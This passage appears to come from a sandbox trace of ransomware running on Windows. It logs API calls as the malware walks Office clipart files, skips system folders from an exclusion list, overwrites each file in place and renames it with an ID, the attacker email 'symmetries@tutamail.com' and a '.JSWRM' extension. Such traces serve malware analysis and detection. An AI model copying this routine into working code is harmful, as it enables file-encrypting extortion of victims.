ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x155, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01245_.GIF", cAlternateFileName="")) returned 1 [0099.295] lstrcmpiW (lpString1="WB01245_.GIF", lpString2=".") returned 1 [0099.295] lstrcmpiW (lpString1="WB01245_.GIF", lpString2="..") returned 1 [0099.295] lstrcmpiW (lpString1="WB01245_.GIF", lpString2="...") returned 1 [0099.295] lstrcmpiW (lpString1="WB01245_.GIF", lpString2="windows") returned -1 [0099.295] lstrcmpiW (lpString1="WB01245_.GIF", lpString2="recovery") returned 1 [0099.295] lstrcmpiW (lpString1="WB01245_.GIF", lpString2="perflogs") returned 1 [0099.295] lstrcmpiW (lpString1="WB01245_.GIF", lpString2="documents and settings") returned 1 [0099.295] lstrcmpiW (lpString1="WB01245_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.295] lstrcmpiW (lpString1="WB01245_.GIF", lpString2="system volume information") returned 1 [0099.295] lstrcmpiW (lpString1="WB01245_.GIF", lpString2="msocache") returned 1 [0099.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0099.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01245_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01245_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01245_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0099.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01245_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01245_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01245_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0099.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0099.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0099.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01245_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01245_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.297] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=341) returned 1 [0099.297] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x150) returned 0x21c578 [0099.297] ReadFile (in: hFile=0x314, lpBuffer=0x21c578, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345e89c*=0x150, lpOverlapped=0x0) returned 1 [0099.387] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.387] WriteFile (in: hFile=0x314, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345e898*=0x150, lpOverlapped=0x0) returned 1 [0099.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0099.387] CloseHandle (hObject=0x314) returned 1 [0099.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0099.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0099.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0099.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0099.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0099.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.388] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01245_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01245_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01245_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01245_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0099.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0099.389] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ce, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01246_.GIF", cAlternateFileName="")) returned 1 [0099.390] lstrcmpiW (lpString1="WB01246_.GIF", lpString2=".") returned 1 [0099.390] lstrcmpiW (lpString1="WB01246_.GIF", lpString2="..") returned 1 [0099.390] lstrcmpiW (lpString1="WB01246_.GIF", lpString2="...") returned 1 [0099.390] lstrcmpiW (lpString1="WB01246_.GIF", lpString2="windows") returned -1 [0099.390] lstrcmpiW (lpString1="WB01246_.GIF", lpString2="recovery") returned 1 [0099.390] lstrcmpiW (lpString1="WB01246_.GIF", lpString2="perflogs") returned 1 [0099.390] lstrcmpiW (lpString1="WB01246_.GIF", lpString2="documents and settings") returned 1 [0099.390] lstrcmpiW (lpString1="WB01246_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.390] lstrcmpiW (lpString1="WB01246_.GIF", lpString2="system volume information") returned 1 [0099.390] lstrcmpiW (lpString1="WB01246_.GIF", lpString2="msocache") returned 1 [0099.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0099.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01246_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01246_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01246_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0099.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01246_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01246_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01246_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0099.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0099.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0099.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01246_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01246_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.391] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=462) returned 1 [0099.391] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c0) returned 0x1ef508 [0099.391] ReadFile (in: hFile=0x314, lpBuffer=0x1ef508, nNumberOfBytesToRead=0x1c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x1ef508*, lpNumberOfBytesRead=0x345e89c*=0x1c0, lpOverlapped=0x0) returned 1 [0099.392] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.392] WriteFile (in: hFile=0x314, lpBuffer=0x1ef508*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x1ef508*, lpNumberOfBytesWritten=0x345e898*=0x1c0, lpOverlapped=0x0) returned 1 [0099.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef508 | out: hHeap=0x1e0000) returned 1 [0099.392] CloseHandle (hObject=0x314) returned 1 [0099.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0099.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0099.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0099.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0099.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0099.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0099.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.393] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01246_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01246_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01246_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01246_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0099.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0099.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0099.394] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xff7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01253_.GIF", cAlternateFileName="")) returned 1 [0099.394] lstrcmpiW (lpString1="WB01253_.GIF", lpString2=".") returned 1 [0099.394] lstrcmpiW (lpString1="WB01253_.GIF", lpString2="..") returned 1 [0099.394] lstrcmpiW (lpString1="WB01253_.GIF", lpString2="...") returned 1 [0099.394] lstrcmpiW (lpString1="WB01253_.GIF", lpString2="windows") returned -1 [0099.394] lstrcmpiW (lpString1="WB01253_.GIF", lpString2="recovery") returned 1 [0099.394] lstrcmpiW (lpString1="WB01253_.GIF", lpString2="perflogs") returned 1 [0099.394] lstrcmpiW (lpString1="WB01253_.GIF", lpString2="documents and settings") returned 1 [0099.394] lstrcmpiW (lpString1="WB01253_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.394] lstrcmpiW (lpString1="WB01253_.GIF", lpString2="system volume information") returned 1 [0099.394] lstrcmpiW (lpString1="WB01253_.GIF", lpString2="msocache") returned 1 [0099.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0099.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01253_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01253_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01253_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0099.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01253_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01253_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01253_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0099.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0099.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01253_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01253_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.395] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4087) returned 1 [0099.395] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xff0) returned 0x23fc98 [0099.395] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xff0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xff0, lpOverlapped=0x0) returned 1 [0099.397] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.397] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xff0, lpOverlapped=0x0) returned 1 [0099.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0099.397] CloseHandle (hObject=0x314) returned 1 [0099.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0099.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0099.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0099.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0099.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0099.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0099.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.398] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01253_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01253_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01253_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01253_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0099.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0099.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0099.399] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01268_.GIF", cAlternateFileName="")) returned 1 [0099.399] lstrcmpiW (lpString1="WB01268_.GIF", lpString2=".") returned 1 [0099.399] lstrcmpiW (lpString1="WB01268_.GIF", lpString2="..") returned 1 [0099.399] lstrcmpiW (lpString1="WB01268_.GIF", lpString2="...") returned 1 [0099.399] lstrcmpiW (lpString1="WB01268_.GIF", lpString2="windows") returned -1 [0099.399] lstrcmpiW (lpString1="WB01268_.GIF", lpString2="recovery") returned 1 [0099.399] lstrcmpiW (lpString1="WB01268_.GIF", lpString2="perflogs") returned 1 [0099.399] lstrcmpiW (lpString1="WB01268_.GIF", lpString2="documents and settings") returned 1 [0099.399] lstrcmpiW (lpString1="WB01268_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.399] lstrcmpiW (lpString1="WB01268_.GIF", lpString2="system volume information") returned 1 [0099.399] lstrcmpiW (lpString1="WB01268_.GIF", lpString2="msocache") returned 1 [0099.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0099.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01268_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01268_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01268_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0099.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0099.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01268_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, 